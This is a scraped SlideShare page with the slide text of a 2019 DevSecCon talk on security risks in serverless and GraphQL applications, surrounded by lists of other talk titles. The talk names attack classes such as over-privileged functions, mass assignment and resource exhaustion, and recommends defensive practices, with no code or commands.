DevSecCon Singapore 2019: Embracing Security - A changing DevOps landscapeDevSecCon Singapore 2019: Embracing Security - A changing DevOps landscape
DevSecCon Singapore 2019: Embracing Security - A changing DevOps landscapeDevSecCon
 
DevSecCon Singapore 2019: The journey of digital transformation through DevSe...
DevSecCon Singapore 2019: The journey of digital transformation through DevSe...DevSecCon Singapore 2019: The journey of digital transformation through DevSe...
DevSecCon Singapore 2019: The journey of digital transformation through DevSe...DevSecCon
 
DevSecCon Singapore 2019: Preventative Security for Kubernetes
DevSecCon Singapore 2019: Preventative Security for KubernetesDevSecCon Singapore 2019: Preventative Security for Kubernetes
DevSecCon Singapore 2019: Preventative Security for KubernetesDevSecCon
 
DevSecCon London 2018: Is your supply chain your achille's heel
DevSecCon London 2018: Is your supply chain your achille's heelDevSecCon London 2018: Is your supply chain your achille's heel
DevSecCon London 2018: Is your supply chain your achille's heelDevSecCon
 
DevSecCon London 2018: Get rid of these TLS certificates
DevSecCon London 2018: Get rid of these TLS certificatesDevSecCon London 2018: Get rid of these TLS certificates
DevSecCon London 2018: Get rid of these TLS certificatesDevSecCon
 
DevSecCon London 2018: Open DevSecOps
DevSecCon London 2018: Open DevSecOpsDevSecCon London 2018: Open DevSecOps
DevSecCon London 2018: Open DevSecOpsDevSecCon
 
DevSecCon London 2018: Building effective DevSecOps teams through role-playin...
DevSecCon London 2018: Building effective DevSecOps teams through role-playin...DevSecCon London 2018: Building effective DevSecOps teams through role-playin...
DevSecCon London 2018: Building effective DevSecOps teams through role-playin...DevSecCon
 
DevSecCon London 2018: Variant Analysis – A critical step in handling vulnera...
DevSecCon London 2018: Variant Analysis – A critical step in handling vulnera...DevSecCon London 2018: Variant Analysis – A critical step in handling vulnera...
DevSecCon London 2018: Variant Analysis – A critical step in handling vulnera...DevSecCon
 
DevSecCon London 2018: Lessons from the legion (the DevSecCon London Remix)
DevSecCon London 2018: Lessons from the legion (the DevSecCon London Remix)DevSecCon London 2018: Lessons from the legion (the DevSecCon London Remix)
DevSecCon London 2018: Lessons from the legion (the DevSecCon London Remix)DevSecCon
 
DevSecCon London 2018: Security in the serverless world
DevSecCon London 2018: Security in the serverless worldDevSecCon London 2018: Security in the serverless world
DevSecCon London 2018: Security in the serverless worldDevSecCon
 
DevSecCon London 2018: Enabling shift-left for 12k banking developers from sc...
DevSecCon London 2018: Enabling shift-left for 12k banking developers from sc...DevSecCon London 2018: Enabling shift-left for 12k banking developers from sc...
DevSecCon London 2018: Enabling shift-left for 12k banking developers from sc...DevSecCon
 
DevSecCon London 2018: Whatever happened to attack aware applications?
DevSecCon London 2018: Whatever happened to attack aware applications?DevSecCon London 2018: Whatever happened to attack aware applications?
DevSecCon London 2018: Whatever happened to attack aware applications?DevSecCon
 
DevSecCon London 2018: A Journey to Continuous Cloud Compliance
DevSecCon London 2018: A Journey to Continuous Cloud ComplianceDevSecCon London 2018: A Journey to Continuous Cloud Compliance
DevSecCon London 2018: A Journey to Continuous Cloud ComplianceDevSecCon
 
DevSecCon London 2018: Securing a web app: business security VS the OWASP top 10
DevSecCon London 2018: Securing a web app: business security VS the OWASP top 10DevSecCon London 2018: Securing a web app: business security VS the OWASP top 10
DevSecCon London 2018: Securing a web app: business security VS the OWASP top 10DevSecCon
 

Mais de DevSecCon (20)

DevSecCon London 2019: Workshop: Cloud Agnostic Security Testing with Scout S...
DevSecCon London 2019: Workshop: Cloud Agnostic Security Testing with Scout S...DevSecCon London 2019: Workshop: Cloud Agnostic Security Testing with Scout S...
DevSecCon London 2019: Workshop: Cloud Agnostic Security Testing with Scout S...
 
DevSecCon London 2019: Are Open Source Developers Security’s New Front Line?
DevSecCon London 2019: Are Open Source Developers Security’s New Front Line?DevSecCon London 2019: Are Open Source Developers Security’s New Front Line?
DevSecCon London 2019: Are Open Source Developers Security’s New Front Line?
 
DevSecCon London 2019: How to Secure OpenShift Environments and What Happens ...
DevSecCon London 2019: How to Secure OpenShift Environments and What Happens ...DevSecCon London 2019: How to Secure OpenShift Environments and What Happens ...
DevSecCon London 2019: How to Secure OpenShift Environments and What Happens ...
 
DevSecCon London 2019: A Kernel of Truth: Intrusion Detection and Attestation...
DevSecCon London 2019: A Kernel of Truth: Intrusion Detection and Attestation...DevSecCon London 2019: A Kernel of Truth: Intrusion Detection and Attestation...
DevSecCon London 2019: A Kernel of Truth: Intrusion Detection and Attestation...
 
DevSecCon Singapore 2019: Four years of reflection: How (not) to secure Web A...
DevSecCon Singapore 2019: Four years of reflection: How (not) to secure Web A...DevSecCon Singapore 2019: Four years of reflection: How (not) to secure Web A...
DevSecCon Singapore 2019: Four years of reflection: How (not) to secure Web A...
 
DevSecCon Singapore 2019: Workshop - Burp extension writing workshop
DevSecCon Singapore 2019: Workshop - Burp extension writing workshopDevSecCon Singapore 2019: Workshop - Burp extension writing workshop
DevSecCon Singapore 2019: Workshop - Burp extension writing workshop
 
DevSecCon Singapore 2019: Embracing Security - A changing DevOps landscape
DevSecCon Singapore 2019: Embracing Security - A changing DevOps landscapeDevSecCon Singapore 2019: Embracing Security - A changing DevOps landscape
DevSecCon Singapore 2019: Embracing Security - A changing DevOps landscape
 
DevSecCon Singapore 2019: The journey of digital transformation through DevSe...
DevSecCon Singapore 2019: The journey of digital transformation through DevSe...DevSecCon Singapore 2019: The journey of digital transformation through DevSe...
DevSecCon Singapore 2019: The journey of digital transformation through DevSe...
 
DevSecCon Singapore 2019: Preventative Security for Kubernetes
DevSecCon Singapore 2019: Preventative Security for KubernetesDevSecCon Singapore 2019: Preventative Security for Kubernetes
DevSecCon Singapore 2019: Preventative Security for Kubernetes
 
DevSecCon London 2018: Is your supply chain your achille's heel
DevSecCon London 2018: Is your supply chain your achille's heelDevSecCon London 2018: Is your supply chain your achille's heel
DevSecCon London 2018: Is your supply chain your achille's heel
 
DevSecCon London 2018: Get rid of these TLS certificates
DevSecCon London 2018: Get rid of these TLS certificatesDevSecCon London 2018: Get rid of these TLS certificates
DevSecCon London 2018: Get rid of these TLS certificates
 
DevSecCon London 2018: Open DevSecOps
DevSecCon London 2018: Open DevSecOpsDevSecCon London 2018: Open DevSecOps
DevSecCon London 2018: Open DevSecOps
 
DevSecCon London 2018: Building effective DevSecOps teams through role-playin...
DevSecCon London 2018: Building effective DevSecOps teams through role-playin...DevSecCon London 2018: Building effective DevSecOps teams through role-playin...
DevSecCon London 2018: Building effective DevSecOps teams through role-playin...
 
DevSecCon London 2018: Variant Analysis – A critical step in handling vulnera...
DevSecCon London 2018: Variant Analysis – A critical step in handling vulnera...DevSecCon London 2018: Variant Analysis – A critical step in handling vulnera...
DevSecCon London 2018: Variant Analysis – A critical step in handling vulnera...
 
DevSecCon London 2018: Lessons from the legion (the DevSecCon London Remix)
DevSecCon London 2018: Lessons from the legion (the DevSecCon London Remix)DevSecCon London 2018: Lessons from the legion (the DevSecCon London Remix)
DevSecCon London 2018: Lessons from the legion (the DevSecCon London Remix)
 
DevSecCon London 2018: Security in the serverless world
DevSecCon London 2018: Security in the serverless worldDevSecCon London 2018: Security in the serverless world
DevSecCon London 2018: Security in the serverless world
 
DevSecCon London 2018: Enabling shift-left for 12k banking developers from sc...
DevSecCon London 2018: Enabling shift-left for 12k banking developers from sc...DevSecCon London 2018: Enabling shift-left for 12k banking developers from sc...
DevSecCon London 2018: Enabling shift-left for 12k banking developers from sc...
 
DevSecCon London 2018: Whatever happened to attack aware applications?
DevSecCon London 2018: Whatever happened to attack aware applications?DevSecCon London 2018: Whatever happened to attack aware applications?
DevSecCon London 2018: Whatever happened to attack aware applications?
 
DevSecCon London 2018: A Journey to Continuous Cloud Compliance
DevSecCon London 2018: A Journey to Continuous Cloud ComplianceDevSecCon London 2018: A Journey to Continuous Cloud Compliance
DevSecCon London 2018: A Journey to Continuous Cloud Compliance
 
DevSecCon London 2018: Securing a web app: business security VS the OWASP top 10
DevSecCon London 2018: Securing a web app: business security VS the OWASP top 10DevSecCon London 2018: Securing a web app: business security VS the OWASP top 10
DevSecCon London 2018: Securing a web app: business security VS the OWASP top 10
 

Último

Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clashcharlottematthew16
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostZilliz
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfPrecisely
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfRankYa
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 

Último (20)

Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clash
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdf
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 

DevSecCon Singapore 2019: An attacker's view of Serverless and GraphQL apps Sharath Kumar Ramadas

  • 1. Singapore | 28 Feb - 01 Mar 2019 An Attacker's View of Serverless and GraphQL Apps Sharath Kumar Ramadas
  • 2. Singapore | 28 Feb - 01 Mar 2019 About Me • Lead Solutions Engineer • we45 - An AppSec Company • Trainer - DevSecOps, Containers & Serverless • Developer - DVFAAS, Orchestron & ThreatPlayBook • Developer → DevOps → DevSecOps @sharathkramadas @sharathkramadas
  • 3. Singapore | 28 Feb - 01 Mar 2019 Agenda • Intro to Serverless • Serverless Attacks • Intro to GraphQL • GraphQL Attacks • Demos
  • 4. Singapore | 28 Feb - 01 Mar 2019 SERVERLESS
  • 5. Singapore | 28 Feb - 01 Mar 2019 Serverless • Functions deployed as ephemeral containers/vms • Functions As A Service (FAAS) • Event trigger architecture • Supports major runtimes • Python, NodeJS, C#, GO, Ruby • Custom runtime also
  • 6. Singapore | 28 Feb - 01 Mar 2019 Serverless Journey
  • 7. Singapore | 28 Feb - 01 Mar 2019 Functions
  • 8. Singapore | 28 Feb - 01 Mar 2019 Why Serverless? • Pay per usage • No server management • Microservices Friendly • Auto-Scalable • Focus on code/features, don’t worry about servers
  • 9. Singapore | 28 Feb - 01 Mar 2019 FAAS Providers
  • 10. Singapore | 28 Feb - 01 Mar 2019 Architecture
  • 11. Singapore | 28 Feb - 01 Mar 2019 Serverless Use-Cases • ChatBots • Event driven apps • Notification Channels (SMS, Email) • Scheduled Jobs • Product websites • Lot more …..
  • 12. Singapore | 28 Feb - 01 Mar 2019 Let’s Deploy!
  • 13. Singapore | 28 Feb - 01 Mar 2019 Functions with Events
  • 14. Singapore | 28 Feb - 01 Mar 2019 An Attacker’s View • Functions are still code • No frameworks involved • Functions as events increases attack surface • Developers are new to servers • Still needs configuration
  • 15. Singapore | 28 Feb - 01 Mar 2019 Attackers are Snipers! • Aimed • Committed • Patient • Invisible • Takes clear Shot
  • 16. Singapore | 28 Feb - 01 Mar 2019 Claim your expenses
  • 17. Singapore | 28 Feb - 01 Mar 2019 Extensive Privileged Functions • Functions with extensive privileges lead to infrastructure compromise • Cloud providers store secrets in plain text • Misconfigured roles can lead to wide spectrum of attacks • Events are most vulnerable due to lack of Authentication and Authorization • Pay per usage model turns out to be expensive.
  • 18. Singapore | 28 Feb - 01 Mar 2019 Accenture S3 Breach
  • 19. Singapore | 28 Feb - 01 Mar 2019 Fedex Breach
  • 20. Singapore | 28 Feb - 01 Mar 2019 Serverless Top 10 • Event data injection • Broken Authentication • Insecure deployment configuration • Over privileged function permissions & roles • Inadequate function monitoring and logging • Insecure 3rd party dependencies • Insecure application secrets storage • DOS and Financial resource exhaustion • Function Execution Flow Manipulation • Improper Exception Handling and Verbose Error Messages
  • 21. Singapore | 28 Feb - 01 Mar 2019 Serverless (Security) Best Practices • Functions with minimal access credentials • Remove insecure dependencies before production • Run SAST scans before code commit • Restrict memory usage for a function • Encrypt the secrets avoid environment variables • Use FAAS providers authorization for access control (ex: AWS Cognito) • Write security test cases and run in CI/CD @sharathkramadas
  • 22. Singapore | 28 Feb - 01 Mar 2019 GraphQL
  • 23. Singapore | 28 Feb - 01 Mar 2019 GraphQL • A query language for API • Tech from Facebook • Query what you want forget about the ‘REST’ • Single endpoint for API calls • Lightweight
  • 24. Singapore | 28 Feb - 01 Mar 2019 REST GraphQL VS
  • 25. Singapore | 28 Feb - 01 Mar 2019 Terminology • Type • Schema • Query • Mutation • Subscription • Introspection • Schema Stitching
  • 26. Singapore | 28 Feb - 01 Mar 2019 Let’s Demo
  • 27. Singapore | 28 Feb - 01 Mar 2019 An Attacker’s View • No response size limiting • Introspection is nice! • Single endpoint access control
  • 28. Singapore | 28 Feb - 01 Mar 2019 Demo Want to get more powers!
  • 29. Singapore | 28 Feb - 01 Mar 2019 Mass Assignment • Frameworks allow to save the raw dump of HTTP request data • Attackers can guess the sensitive fields • Sensitive fields can allow to escalate privileges • GraphQL has introspection enabled by default • Introspection leaks the sensitive fields information • GraphQL supports JSON Scalar
  • 30. Singapore | 28 Feb - 01 Mar 2019 GitHub Attack
  • 31. Singapore | 28 Feb - 01 Mar 2019 Let’s burn few dollars
  • 32. Singapore | 28 Feb - 01 Mar 2019 Serverless Cost
  • 33. Singapore | 28 Feb - 01 Mar 2019 Resource Exhaustion • aka Denial-Of-Service attack • Overwhelmed requests to crash the server • Causes memory leak and resource exhaust • Serverless + GraphQL = (pay per usage + scale) • 2 million requests * 3 dollar per query = (I will live it to your imagination!)
  • 34. Singapore | 28 Feb - 01 Mar 2019 Recent Attack
  • 35. Singapore | 28 Feb - 01 Mar 2019 GraphQL (Security) Best Practices • Disable introspection • Disable playground in production • Limit the query size • Depth limiting for nested queries • Avoid scalars use input types
  • 36. Singapore | 28 Feb - 01 Mar 2019 Hack It Yourself! https://github.com/we45/DVFaaS-Damn-Vulnerable-Functions-as-a-Service
  • 37. Singapore | 28 Feb - 01 Mar 2019 Things to consider • OWASP Top 10 • Serverless Top 10 • SAST and SCA tools • Threat-Modeling
  • 38. Singapore | 28 Feb - 01 Mar 2019 Key Takeaways • Serverless security is still an application security problem • Roles and Permissions should be well thought of • Secure coding practices need to be followed • Resource limitations is highly recommended
  • 39. Singapore | 28 Feb - 01 Mar 2019 Thank You @sharathkramadas @sharathkramadas